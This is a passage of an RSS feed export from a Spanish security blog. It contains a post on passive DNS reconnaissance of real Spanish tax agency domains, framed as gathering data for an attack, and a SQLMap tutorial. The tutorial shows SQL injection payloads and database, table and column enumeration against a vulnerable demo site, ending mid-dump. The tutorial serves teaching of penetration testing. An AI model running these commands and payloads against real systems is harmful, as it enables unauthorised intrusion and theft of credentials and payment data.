<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/metasploitable/'>Metasploitable</a>, <a href='http://seifreed.com/tag/seguridad/'>Seguridad</a>, <a href='http://seifreed.com/tag/windows-xp/'>Windows XP</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3990/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3990/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3990/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3990/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3990/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3990/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3990/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3990/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3990/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3990/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3990/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3990/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3990/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3990/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3990&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/12/24/preparando-windows-xp-sp2-para-entorno-de-pruebas-de-auditoria/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img196.imageshack.us/img196/4562/securitycenter.png" medium="image" />

		<media:content url="http://img809.imageshack.us/img809/798/alertasa.png" medium="image" />

		<media:content url="http://img11.imageshack.us/img11/2518/usocompartido.png" medium="image" />

		<media:content url="http://img802.imageshack.us/img802/9254/serviciosadicionales.png" medium="image" />

		<media:content url="http://img17.imageshack.us/img17/160/monitoring.png" medium="image" />

		<media:content url="http://img401.imageshack.us/img401/4627/sqlexpress01.png" medium="image" />

		<media:content url="http://img401.imageshack.us/img401/4627/sqlexpress01.png" medium="image" />

		<media:content url="http://img20.imageshack.us/img20/2051/sqlexpress03.png" medium="image" />

		<media:content url="http://img856.imageshack.us/img856/1734/sqlexpress04.png" medium="image" />

		<media:content url="http://img811.imageshack.us/img811/3385/sqlexpress05.png" medium="image" />

		<media:content url="http://img23.imageshack.us/img23/3005/webapp01.png" medium="image" />

		<media:content url="http://img208.imageshack.us/img208/6515/webapp02.png" medium="image" />

		<media:content url="http://img412.imageshack.us/img412/5426/webapp03.png" medium="image" />

		<media:content url="http://img819.imageshack.us/img819/9644/webapp04.png" medium="image" />

		<media:content url="http://img713.imageshack.us/img713/3258/webapp05.png" medium="image" />

		<media:content url="http://img502.imageshack.us/img502/3896/webapp06.png" medium="image" />

		<media:content url="http://img823.imageshack.us/img823/1640/webapp07.png" medium="image" />

		<media:content url="http://img522.imageshack.us/img522/4193/webapp08.png" medium="image" />
	</item>
		<item>
		<title>Reconocimiento activo y pasivo</title>
		<link>http://seifreed.com/2011/09/04/reconocimiento-activo-y-pasivo/</link>
		<comments>http://seifreed.com/2011/09/04/reconocimiento-activo-y-pasivo/#comments</comments>
		<pubDate>Sun, 04 Sep 2011 13:09:47 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[activo]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[pasivo]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3890</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! A la hora de hacer una auditoría es importante saber que vamos a auditar. Hay dos maneras de hacer esto, de manera activa o de manera pasiva. La diferencia es, de manera activa que sería usando herramientas que generen avisos en el sitio remoto donde haremos la auditoría. Y la [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3890&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>A la hora de hacer una auditoría es importante saber que vamos a auditar. Hay dos maneras de hacer esto, de manera <strong>activa</strong> o de manera <strong>pasiva</strong>.</p>
<p>La diferencia es, de manera activa que sería usando herramientas que generen avisos en el sitio remoto donde haremos la auditoría.</p>
<p>Y la alternativa sería de manera pasiva que sería usando herramientas que recopilen información de manera pasiva, es decir, que sea pública.</p>
<p>En un proceso de reconocimiento podemos indicar 10 fases:</p>
<ol>
<li>Bloques de red</li>
<li>DNS</li>
<li>Nombres y dominios</li>
<li>Rango de red y subred</li>
<li>Direcciones IP&#8217;s específicas</li>
<li>Máquinas activas</li>
<li>Puertos abiertos y aplicaciones</li>
<li>Detectar sistema operativo</li>
<li>Información relacionada con el email, teléfonos</li>
<li>País y ciudad donde residen los servidores</li>
</ol>
<p>Con esta información si logramos identificarla de manera pasiva tendremos muchos datos, sin que lo sepan,  para poder hacer el ataque.</p>
<p>Empezamos con los bloques de red, es decir, que direcciones IP utiliza la organización en cuestión</p>
<p>Podemos por ejemplo hacer una enumeración de los servidores de email, los servidores DNS etc.. Para ello podemos usar DNSrecon</p>
<blockquote>
<pre>macbook:dnsrecon seifreed$ python dnsrecon.py -d aeat.es
[*] Performing General Enumeration of Domain: aeat.es
[*]	SOA esifw1.tsai.es 213.0.43.37
[*]	NS esifw1.tsai.es 213.0.43.37
[*]	NS esifw2.tsai.es 213.4.194.5
[*]	MX correodeempresas.telefonica.es 212.170.236.87
[*]	A aeat.es 195.235.106.193
[*] Enumerating SRV Records
[-] No SRV Records Found for aeat.es
[*] 0 Records Found</pre>
</blockquote>
<p>Y también de la Agencia Tributaria</p>
<blockquote>
<pre>macbook:dnsrecon seifreed$ python dnsrecon.py -d agenciatributaria.es
[*] Performing General Enumeration of Domain: agenciatributaria.es
[*]	SOA ns1.telefonica-data.com 213.0.43.37
[*]	NS ns2.telefonica-data.com 213.4.194.5
[*]	NS ns1.telefonica-data.com 213.0.43.37
[-] Could not Resolve MX Records for agenciatributaria.es
[*]	A agenciatributaria.es 212.170.236.148
[*] Enumerating SRV Records
[-] No SRV Records Found for agenciatributaria.es
[*] 0 Records Found</pre>
</blockquote>
<p>Ya hemos obtenido diferente información acerca de los NS y los MX y los DNS</p>
<p>La segunda parte que era obtener información acerca de los DNS, ya los tenemos.</p>
<p>Ahora obtendremos los diferentes dominios, podemos usar para ello Maltego</p>
<p><img class="aligncenter" src="http://img846.imageshack.us/img846/8956/infokn.png" alt="" width="282" height="334" />Ya tenemos mas información, ahora con otra herramienta como es netcraft podemos obtener sistemas operativos y demás</p>
<p>La información la podemos obtener desde aquí</p>
<p><a href="http://toolbar.netcraft.com/site_report?url=http://www.agenciatributaria.es">Informción NetCraft</a></p>
<p>&nbsp;</p>
<p>Estos son algunas de las cosas que podemos obtener de manera pasiva.</p>
<p>Así que ya sabéis</p>
<p>&nbsp;</p>
<p>Un saludo</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/seguridad/'>Seguridad</a> Tagged: <a href='http://seifreed.com/tag/activo/'>activo</a>, <a href='http://seifreed.com/tag/hacking/'>hacking</a>, <a href='http://seifreed.com/tag/pasivo/'>pasivo</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/3890/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/3890/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/3890/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/3890/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/3890/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/3890/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/3890/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/3890/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/3890/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/3890/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/3890/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/3890/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/3890/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/3890/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3890&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2011/09/04/reconocimiento-activo-y-pasivo/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img846.imageshack.us/img846/8956/infokn.png" medium="image" />
	</item>
		<item>
		<title>SQLMap</title>
		<link>http://seifreed.com/2011/08/18/sqlmap/</link>
		<comments>http://seifreed.com/2011/08/18/sqlmap/#comments</comments>
		<pubDate>Thu, 18 Aug 2011 15:10:26 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[Backtrack]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[bases de datos]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[SQLMap]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=3870</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! SQLMap es una herramienta para automatizar la explotación de vulnerabilidades SQL. Para disponer de la última versión y, por lo tanto poder usar todas sus características bajamos la última versión con svn root@bt:/pentest/database/sqlmap# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev Ya disponemos de la última versión de SQLMap. Ahora empezaremos ha hacer una [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&#038;blog=1473574&#038;post=3870&#038;subd=seifreed&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>SQLMap es una herramienta para automatizar la explotación de vulnerabilidades SQL.</p>
<p>Para disponer de la última versión y, por lo tanto poder usar todas sus características bajamos la última versión con svn<br />
root@bt:/pentest/database/sqlmap# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev<br />
Ya disponemos de la última versión de SQLMap.</p>
<p>Ahora empezaremos ha hacer una prueba.</p>
<p>Primero hay que encontrar una página web vulnerable, y además si permite hacer inyección y extraer información.</p>
<p>Empezamos,</p>
<pre><strong><span style="color:#ff0000;">root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1</span></strong> 

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
 It is the end user's responsibility to obey all applicable local, state and federal laws. 
Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:36:55

[16:36:55] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:36:55] [INFO] resuming injection data from session file
[16:36:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:36:55] [INFO] testing connection to the target url
[16:36:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x 
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL &gt; 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:36:56] [INFO] the back-end DBMS is MySQL
<strong><span style="color:#ff0000;">web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)</span></strong>
<strong><span style="color:#ff0000;">web application technology: Apache 2.0.55, PHP 5.1.2</span></strong>
<strong><span style="color:#ff0000;">back-end DBMS: MySQL 5.0</span></strong>
[16:36:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'
[*] shutting down at 16:36:56</pre>
<p>He remarcado en rojo información importante.</p>
<p>Podemos ver que es vulnerable así que ahora extraeremos tanto los usuarios como las bases de datos</p>
<pre><strong><span style="color:#ff0000;">root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 --dbs --users</span></strong>

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent
 is illegal. It is the end user's responsibility to obey all applicable local, state and
 federal laws. Authors assume no liability and are not responsible for any misuse or damage 
caused by this program

[*] starting at 16:41:00

[16:41:00] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:41:00] [INFO] resuming injection data from session file
[16:41:00] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:41:00] [INFO] testing connection to the target url
[16:41:01] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL &gt; 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:41:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
<strong><span style="color:#ff0000;">[16:41:01] [INFO] fetching database users</span></strong>
<strong><span style="color:#ff0000;">database management system users [1]:</span></strong>
<strong><span style="color:#ff0000;">[*] 'acuart'@'localhost'</span></strong>

<strong><span style="color:#ff0000;">[16:41:01] [INFO] fetching database names</span></strong>
<strong><span style="color:#ff0000;">available databases [3]:</span></strong>
<strong><span style="color:#ff0000;">[*] acuart</span></strong>
<strong><span style="color:#ff0000;">[*] information_schema</span></strong>
<strong><span style="color:#ff0000;">[*] modrewriteShop</span></strong>

[16:41:01] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:41:01</pre>
<p>Queda remaracado en rojo información acerca de la bases de datos además del usuario.</p>
<p>Ahora sacaremos las tablas concretas de una base de datos</p>
<pre><strong><span style="color:#ff0000;">root@bt:/pentest/database/sqlmap# python sqlmap.py 
-u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --tables</span></strong>

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable local,
 state and federal laws. Authors assume no liability and are not responsible for any misuse or 
damage caused by this program

[*] starting at 16:46:44

[16:46:44] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:46:44] [INFO] resuming injection data from session file
[16:46:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:46:45] [INFO] testing connection to the target url
[16:46:45] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL &gt; 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:46:45] [INFO] fetching tables for database: acuart
[16:46:45] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': 
acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">[7 tables]</span></strong>
<strong><span style="color:#ff0000;">+-----------+</span></strong>
<strong><span style="color:#ff0000;">| artists |</span></strong>
<strong><span style="color:#ff0000;">| carts |</span></strong>
<strong><span style="color:#ff0000;">| categ |</span></strong>
<strong><span style="color:#ff0000;">| featured |</span></strong>
<strong><span style="color:#ff0000;">| guestbook |</span></strong>
<strong><span style="color:#ff0000;">| pictures |</span></strong>
<strong><span style="color:#ff0000;">| users |</span></strong>
<strong><span style="color:#ff0000;">+-----------+</span></strong>

[16:46:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:46:45</pre>
<p>Ahora que ya tenemos las tablas, iremos a buscar las columnas</p>
<pre><strong><span style="color:#ff0000;">root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart
 --columns</span></strong>

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is
 illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
 Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:50:28

[16:50:28] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:50:28] [INFO] resuming injection data from session file
[16:50:28] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:50:29] [INFO] testing connection to the target url
[16:50:29] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT 
(CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS
 CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL &gt; 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:50:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:50:29] [INFO] fetching tables for database: acuart
[16:50:29] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': 
acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
<strong><span style="color:#ff0000;">[16:50:29] [INFO] fetching columns for table 'guestbook' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:50:29] [INFO] fetching columns for table 'carts' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:50:30] [INFO] fetching columns for table 'categ' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:50:30] [INFO] fetching columns for table 'featured' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:50:30] [INFO] fetching columns for table 'artists' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:50:31] [INFO] fetching columns for table 'pictures' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">[16:50:31] [INFO] fetching columns for table 'users' on database 'acuart'</span></strong>
<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: categ</span></strong>
<strong><span style="color:#ff0000;">[3 columns]</span></strong>
<strong><span style="color:#ff0000;">+--------+-------------+</span></strong>
<strong><span style="color:#ff0000;">| Column | Type |</span></strong>
<strong><span style="color:#ff0000;">+--------+-------------+</span></strong>
<strong><span style="color:#ff0000;">| cat_id | int(5) |</span></strong>
<strong><span style="color:#ff0000;">| cdesc | tinytext |</span></strong>
<strong><span style="color:#ff0000;">| cname | varchar(50) |</span></strong>
<strong><span style="color:#ff0000;">+--------+-------------+</span></strong>

<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: users</span></strong>
<strong><span style="color:#ff0000;">[8 columns]</span></strong>
<strong><span style="color:#ff0000;">+---------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| Column | Type |</span></strong>
<strong><span style="color:#ff0000;">+---------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| address | mediumtext |</span></strong>
<strong><span style="color:#ff0000;">| cart | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">| cc | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">| email | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">| name | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">| pass | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">| phone | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">| uname | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">+---------+--------------+</span></strong>

<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: carts</span></strong>
<strong><span style="color:#ff0000;">[3 columns]</span></strong>
<strong><span style="color:#ff0000;">+---------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| Column | Type |</span></strong>
<strong><span style="color:#ff0000;">+---------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| cart_id | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">| item | int(11) |</span></strong>
<strong><span style="color:#ff0000;">| price | int(11) |</span></strong>
<strong><span style="color:#ff0000;">+---------+--------------+</span></strong>

<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: pictures</span></strong>
<strong><span style="color:#ff0000;">[8 columns]</span></strong>
<strong><span style="color:#ff0000;">+--------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| Column | Type |</span></strong>
<strong><span style="color:#ff0000;">+--------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| a_id | int(11) |</span></strong>
<strong><span style="color:#ff0000;">| cat_id | int(11) |</span></strong>
<strong><span style="color:#ff0000;">| img | varchar(50) |</span></strong>
<strong><span style="color:#ff0000;">| pic_id | int(5) |</span></strong>
<strong><span style="color:#ff0000;">| plong | text |</span></strong>
<strong><span style="color:#ff0000;">| price | int(11) |</span></strong>
<strong><span style="color:#ff0000;">| pshort | mediumtext |</span></strong>
<strong><span style="color:#ff0000;">| title | varchar(100) |</span></strong>
<strong><span style="color:#ff0000;">+--------+--------------+</span></strong>

<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: featured</span></strong>
<strong><span style="color:#ff0000;">[2 columns]</span></strong>
<strong><span style="color:#ff0000;">+--------------+---------+</span></strong>
<strong><span style="color:#ff0000;">| Column | Type |</span></strong>
<strong><span style="color:#ff0000;">+--------------+---------+</span></strong>
<strong><span style="color:#ff0000;">| feature_text | text |</span></strong>
<strong><span style="color:#ff0000;">| pic_id | int(11) |</span></strong>
<strong><span style="color:#ff0000;">+--------------+---------+</span></strong>

<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: artists</span></strong>
<strong><span style="color:#ff0000;">[3 columns]</span></strong>
<strong><span style="color:#ff0000;">+-----------+-------------+</span></strong>
<strong><span style="color:#ff0000;">| Column | Type |</span></strong>
<strong><span style="color:#ff0000;">+-----------+-------------+</span></strong>
<strong><span style="color:#ff0000;">| adesc | text |</span></strong>
<strong><span style="color:#ff0000;">| aname | varchar(50) |</span></strong>
<strong><span style="color:#ff0000;">| artist_id | int(5) |</span></strong>
<strong><span style="color:#ff0000;">+-----------+-------------+</span></strong>

<strong><span style="color:#ff0000;">Database: acuart</span></strong>
<strong><span style="color:#ff0000;">Table: guestbook</span></strong>
<strong><span style="color:#ff0000;">[3 columns]</span></strong>
<strong><span style="color:#ff0000;">+----------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| Column | Type |</span></strong>
<strong><span style="color:#ff0000;">+----------+--------------+</span></strong>
<strong><span style="color:#ff0000;">| mesaj | text |</span></strong>
<strong><span style="color:#ff0000;">| sender | varchar(150) |</span></strong>
<strong><span style="color:#ff0000;">| senttime | int(32) |</span></strong>
<strong><span style="color:#ff0000;">+----------+--------------+</span></strong>

[16:50:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:50:31</pre>
<p>Ya tenemos la información referente a las columnas</p>
<pre><strong><span style="color:#ff0000;">root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart
 --dump</span></strong>

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
 It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume 
no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:33

[16:56:33] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:56:33] [INFO] resuming injection data from session file
[16:56:33] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:56:33] [INFO] testing connection to the target url
[16:56:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
